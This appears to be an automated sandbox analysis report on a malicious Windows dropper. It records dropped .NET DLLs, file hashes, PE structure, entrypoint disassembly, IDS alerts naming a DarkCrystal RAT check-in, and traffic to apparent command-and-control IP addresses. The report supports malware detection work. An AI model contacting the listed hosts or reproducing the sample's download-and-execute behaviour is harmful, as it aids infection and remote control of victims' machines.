SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wAkXRBsB.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xxLgnBHw.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\yxUOovbm.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465711089817267
Encrypted:	false
SSDEEP:	6144:jIXfpi67eLPU9skLmb0b4DWSPKaJG8nAgejZMMhA2gX4WABl0uNzdwBCswSby:0XD94DWlLZMM6YFHd+y
MD5:	B40621C140087780919CD65D2102E6C5
SHA1:	CDB34FB9449686FCDE739230BA04EB6F512D8D41
SHA-256:	C891DA33470FB7769814355F19BFA07BC9317758D0CE805E23047DEB7B14BF6A
SHA-512:	38C5AB04612259E632D57F9E41043A80608AE5104C8ACDF0D44929F856080F472B3EAC92BD1685188F6755E0D02F8CC37EA85655F6116F29BF416EE35AECF123
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..n.N................................................................................................................................................................................................................................................................................................................................................y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
File Type:	ISO-8859 text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	571
Entropy (8bit):	4.9398118662542965
Encrypted:	false
SSDEEP:	12:t+3p+t/hQAOfVaOQsXCzLQ8X+UwkY1v3igBe:Yot/h+ltcQy+UwkY1vdBe
MD5:	5294778E41EE83E1F1E78B56466AD690
SHA1:	348B8B4687216D57B8DF59BBCEC481DC9D1E61A6
SHA-256:	3AC122288181813B83236E1A2BCB449C51B50A3CA4925677A38C08B2FC6DF69C
SHA-512:	381FB6F3AA34E41C17DB3DD8E68B85508F51A94B3E77C479E40AD074767D1CEAE89B6E04FB7DD3D02A74D1AC3431B30920860A198C73387A865051538AE140F1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: \Device\ConDrv, Author: Joe Security
Preview:	.............................................................------------------------.. ..[-] Fetching endpoint.....[-] Bootstrapper up to date...[-] Killing conflicting processes.....[-] Ensuring essential directories.....[-] Ensuring essential dependencies.....[-] Downloading node......Unhandled Exception: System.Net.WebException: The operation has timed out.. at System.Net.WebClient.DownloadFile(Uri address, String fileName).. at Program.DownloadAndInstallNode().. at Program.EnsureDependencies().. at Program.Main(String[] args).

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.625122004957738
Encrypted:	false
SSDEEP:	12:P+5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:wdUOAokItULVDv
MD5:	5AAB63919D116446568A8CFE40A6C7D8
SHA1:	31041C58BAA10863915729E157AD81617F0352B0
SHA-256:	6C4D91E676419687C0780E3F8395383A9164008754E4A394E0514FB21127A139
SHA-512:	00696EAB4A6452A0D47C2752EF4CE7037CAD9A1441372A67DD1DA3765A24519502C948FC749A6CF75F591BCCD91DE9B713C6F96B67C87457EB8D2A04A86E74DF
Malicious:	false
Preview:	..Pinging 226546 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.5365643134828675
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.19% Win32 Executable (generic) a (10002005/4) 49.14% Win32 Executable Borland Delphi 6 (262906/60) 1.29% InstallShield setup (43055/19) 0.21% Win32 Executable Delphi generic (14689/80) 0.07%
File name:	wmdqEYgW2i.exe
File size:	4'851'200 bytes
MD5:	8576f95a0e018025e8b46367ae311e83
SHA1:	0d1c5e913dcc60910e454416e3c149c9d05f02f5
SHA256:	b8c9a273058d6214aeccc822fb5f304edc734bd57a4ac43450feeacef70fafb8
SHA512:	ef30324c2f5afdfe3639e7322e8e1845e661d55cd4ffff6f7bf65c85e8ac23d5d7c5b92f39d1807c9524a5fb29b21b45249a617f63f0e35ecd3803edd6dc7f30
SSDEEP:	98304:d++ALvAvoV3JDBQSBK5f7a6uBt9iofavIah:TmvvV5DpQ7a6ugoCvIw
TLSH:	3826E005B6D08E33C2AE5732D5B7463C13F0E2617662EB0F364D15E66C077A1AE613AB
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4020cc
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d59a4a699610169663a929d37c90be43

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov ecx, 0000000Ch
push 00000000h
push 00000000h
dec ecx
jne 00007FF8A893599Bh
push ecx
push ebx
push esi
push edi
mov eax, 0040209Ch
call 00007FF8A8935410h
xor eax, eax
push ebp
push 00402361h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
lea edx, dword ptr [ebp-14h]
mov eax, 00402378h
call 00007FF8A89357E9h
mov eax, dword ptr [ebp-14h]
call 00007FF8A89358B9h
mov edi, eax
test edi, edi
jng 00007FF8A8935BD6h
mov ebx, 00000001h
lea edx, dword ptr [ebp-20h]
mov eax, ebx
call 00007FF8A8935878h
mov ecx, dword ptr [ebp-20h]
lea eax, dword ptr [ebp-1Ch]
mov edx, 00402384h
call 00007FF8A8935008h
mov eax, dword ptr [ebp-1Ch]
lea edx, dword ptr [ebp-18h]
call 00007FF8A89357ADh
mov edx, dword ptr [ebp-18h]
mov eax, 00404680h
call 00007FF8A8934EE0h
lea edx, dword ptr [ebp-2Ch]
mov eax, ebx
call 00007FF8A8935846h
mov ecx, dword ptr [ebp-2Ch]
lea eax, dword ptr [ebp-28h]
mov edx, 00402390h
call 00007FF8A8934FD6h
mov eax, dword ptr [ebp-28h]
lea edx, dword ptr [ebp-24h]
call 00007FF8A893577Bh
mov edx, dword ptr [ebp-24h]
mov eax, 00404684h
call 00007FF8A8934EAEh
lea edx, dword ptr [ebp-38h]
mov eax, ebx
call 00007FF8A8935814h
mov ecx, dword ptr [ebp-38h]
lea eax, dword ptr [ebp-34h]
mov edx, 0040239Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5000	0x302	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9000	0x49e400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0x1c8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x7000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x13b8	0x1400	e5913936857bed3b3b2fbac53e973471	False	0.6318359375	data	6.340990548290613	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x3000	0x7c	0x200	cef89de607e490725490a3cd679af6bb	False	0.162109375	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 4230400	1.1176271682252383	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x4000	0x695	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5000	0x302	0x400	3d2f2fc4e279cba623217ec9de264c4f	False	0.3876953125	data	3.47731642923935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x6000	0x4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x7000	0x18	0x200	467f29e48f3451df774e13adae5aafc2	False	0.05078125	data	0.1991075177871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x8000	0x1c8	0x200	9859d413c7408cb699cca05d648c2502	False	0.876953125	data	5.7832974211095225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x9000	0x49e400	0x49e400	367317a9f0b188f4a1820ac49c20fef3	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_RCDATA	0x9294	0xc8000	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows	0.34697509765625
RT_RCDATA	0xd1294	0x3d60f0	PE32 executable (GUI) Intel 80386, for MS Windows	0.4885377883911133
RT_RCDATA	0x4a7384	0x10	ASCII text, with no line terminators	1.5
RT_RCDATA	0x4a7394	0xe	ASCII text, with no line terminators	1.5714285714285714
RT_RCDATA	0x4a73a4	0x1	very short file (no magic)	9.0
RT_RCDATA	0x4a73a8	0x1	very short file (no magic)	9.0
RT_RCDATA	0x4a73ac	0x1	very short file (no magic)	9.0
RT_RCDATA	0x4a73b0	0x1	very short file (no magic)	9.0
RT_RCDATA	0x4a73b4	0x10	data	1.5
RT_RCDATA	0x4a73c4	0x1	very short file (no magic)	9.0
RT_RCDATA	0x4a73c8	0x38	data	1.0714285714285714

Imports

DLL	Import
kernel32.dll	GetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
kernel32.dll	WriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
shfolder.dll	SHGetFolderPathA
shell32.dll	ShellExecuteA

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-15T04:17:08.455721+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49732	104.21.93.27	443	TCP
2024-12-15T04:17:26.419865+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49743	172.67.185.214	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2024 04:17:02.429852009 CET	49730	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:02.429918051 CET	443	49730	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:02.430069923 CET	49730	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:02.453908920 CET	49730	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:02.453938961 CET	443	49730	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:03.679857969 CET	443	49730	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:03.679979086 CET	49730	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:03.684815884 CET	49730	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:03.684829950 CET	443	49730	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:03.685354948 CET	443	49730	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:03.732240915 CET	49730	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:03.776962042 CET	49730	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:03.819336891 CET	443	49730	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:04.319210052 CET	443	49730	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:04.319483995 CET	443	49730	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:04.319575071 CET	49730	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:04.544229031 CET	49730	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:06.771707058 CET	49732	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:06.771770954 CET	443	49732	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:06.772058964 CET	49732	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:06.776148081 CET	49732	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:06.776161909 CET	443	49732	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:07.996428013 CET	443	49732	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:07.996512890 CET	49732	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:07.998316050 CET	49732	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:07.998330116 CET	443	49732	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:07.999254942 CET	443	49732	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:08.000782967 CET	49732	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:08.047337055 CET	443	49732	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:08.455651999 CET	443	49732	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:08.455909014 CET	443	49732	104.21.93.27	192.168.2.4
Dec 15, 2024 04:17:08.456032038 CET	49732	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:08.456486940 CET	49732	443	192.168.2.4	104.21.93.27
Dec 15, 2024 04:17:09.458623886 CET	49733	443	192.168.2.4	128.116.123.3
Dec 15, 2024 04:17:09.458655119 CET	443	49733	128.116.123.3	192.168.2.4
Dec 15, 2024 04:17:09.458951950 CET	49733	443	192.168.2.4	128.116.123.3
Dec 15, 2024 04:17:09.459297895 CET	49733	443	192.168.2.4	128.116.123.3
Dec 15, 2024 04:17:09.459309101 CET	443	49733	128.116.123.3	192.168.2.4
Dec 15, 2024 04:17:11.049021006 CET	443	49733	128.116.123.3	192.168.2.4
Dec 15, 2024 04:17:11.049103975 CET	49733	443	192.168.2.4	128.116.123.3
Dec 15, 2024 04:17:11.054136038 CET	49733	443	192.168.2.4	128.116.123.3
Dec 15, 2024 04:17:11.054148912 CET	443	49733	128.116.123.3	192.168.2.4
Dec 15, 2024 04:17:11.054550886 CET	443	49733	128.116.123.3	192.168.2.4
Dec 15, 2024 04:17:11.055803061 CET	49733	443	192.168.2.4	128.116.123.3
Dec 15, 2024 04:17:11.099355936 CET	443	49733	128.116.123.3	192.168.2.4
Dec 15, 2024 04:17:11.754604101 CET	443	49733	128.116.123.3	192.168.2.4
Dec 15, 2024 04:17:11.754767895 CET	443	49733	128.116.123.3	192.168.2.4
Dec 15, 2024 04:17:11.754818916 CET	49733	443	192.168.2.4	128.116.123.3
Dec 15, 2024 04:17:11.755389929 CET	49733	443	192.168.2.4	128.116.123.3
Dec 15, 2024 04:17:13.668536901 CET	49734	443	192.168.2.4	104.20.22.46
Dec 15, 2024 04:17:13.668639898 CET	443	49734	104.20.22.46	192.168.2.4
Dec 15, 2024 04:17:13.668718100 CET	49734	443	192.168.2.4	104.20.22.46
Dec 15, 2024 04:17:13.669058084 CET	49734	443	192.168.2.4	104.20.22.46
Dec 15, 2024 04:17:13.669090986 CET	443	49734	104.20.22.46	192.168.2.4
Dec 15, 2024 04:17:14.907466888 CET	443	49734	104.20.22.46	192.168.2.4
Dec 15, 2024 04:17:14.907540083 CET	49734	443	192.168.2.4	104.20.22.46
Dec 15, 2024 04:17:14.910074949 CET	49734	443	192.168.2.4	104.20.22.46
Dec 15, 2024 04:17:14.910084963 CET	443	49734	104.20.22.46	192.168.2.4
Dec 15, 2024 04:17:14.910475969 CET	443	49734	104.20.22.46	192.168.2.4
Dec 15, 2024 04:17:14.911494017 CET	49734	443	192.168.2.4	104.20.22.46
Dec 15, 2024 04:17:14.955409050 CET	443	49734	104.20.22.46	192.168.2.4
Dec 15, 2024 04:17:15.670747995 CET	443	49734	104.20.22.46	192.168.2.4
Dec 15, 2024 04:17:15.670960903 CET	443	49734	104.20.22.46	192.168.2.4
Dec 15, 2024 04:17:15.671035051 CET	49734	443	192.168.2.4	104.20.22.46
Dec 15, 2024 04:17:15.672378063 CET	49734	443	192.168.2.4	104.20.22.46
Dec 15, 2024 04:17:25.168272018 CET	49743	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:25.288167000 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:25.288270950 CET	49743	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:25.288737059 CET	49743	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:25.408478975 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:25.638724089 CET	49743	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:25.758534908 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:26.374568939 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:26.419864893 CET	49743	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:26.631629944 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:26.631676912 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:26.631752014 CET	49743	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:26.706526995 CET	49743	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:26.800652981 CET	49744	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:26.826421976 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:26.920552015 CET	80	49744	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:26.920654058 CET	49744	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:26.920830011 CET	49744	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:27.020796061 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:27.021024942 CET	49743	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:27.040568113 CET	80	49744	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:27.141108036 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:27.279264927 CET	49744	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:27.399441004 CET	80	49744	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:27.399501085 CET	80	49744	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:27.399529934 CET	80	49744	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:27.504381895 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:27.531618118 CET	49743	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:27.651504993 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:27.846882105 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:27.847112894 CET	49743	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:27.967190981 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:27.967225075 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:28.008450031 CET	80	49744	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:28.052980900 CET	49744	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:28.250456095 CET	80	49744	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:28.294766903 CET	49744	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:28.321693897 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:28.370820045 CET	49743	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:28.371082067 CET	49744	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:28.371351004 CET	49745	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:28.491117001 CET	80	49745	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:28.491208076 CET	49745	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:28.491338968 CET	80	49743	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:28.491372108 CET	49745	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:28.491517067 CET	49743	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:28.491759062 CET	80	49744	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:28.491931915 CET	49744	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:28.611078978 CET	80	49745	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:28.841716051 CET	49745	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:28.961687088 CET	80	49745	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:28.961723089 CET	80	49745	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:28.961749077 CET	80	49745	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:29.577511072 CET	80	49745	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:29.622977018 CET	49745	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:29.830082893 CET	80	49745	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:29.872986078 CET	49745	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:29.948246002 CET	49747	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:30.068541050 CET	80	49747	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:30.068645000 CET	49747	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:30.068859100 CET	49747	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:30.188992023 CET	80	49747	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:30.423261881 CET	49747	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:30.543169022 CET	80	49747	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:30.543201923 CET	80	49747	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:30.543234110 CET	80	49747	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:31.156102896 CET	80	49747	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:31.201112986 CET	49747	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:31.398201942 CET	80	49747	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:31.451016903 CET	49747	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:31.533067942 CET	49747	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:31.534118891 CET	49749	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:31.653260946 CET	80	49747	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:31.653681993 CET	49747	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:31.653856039 CET	80	49749	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:31.653978109 CET	49749	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:31.654244900 CET	49749	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:31.774024963 CET	80	49749	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:32.013773918 CET	49749	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:32.133815050 CET	80	49749	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:32.133848906 CET	80	49749	172.67.185.214	192.168.2.4
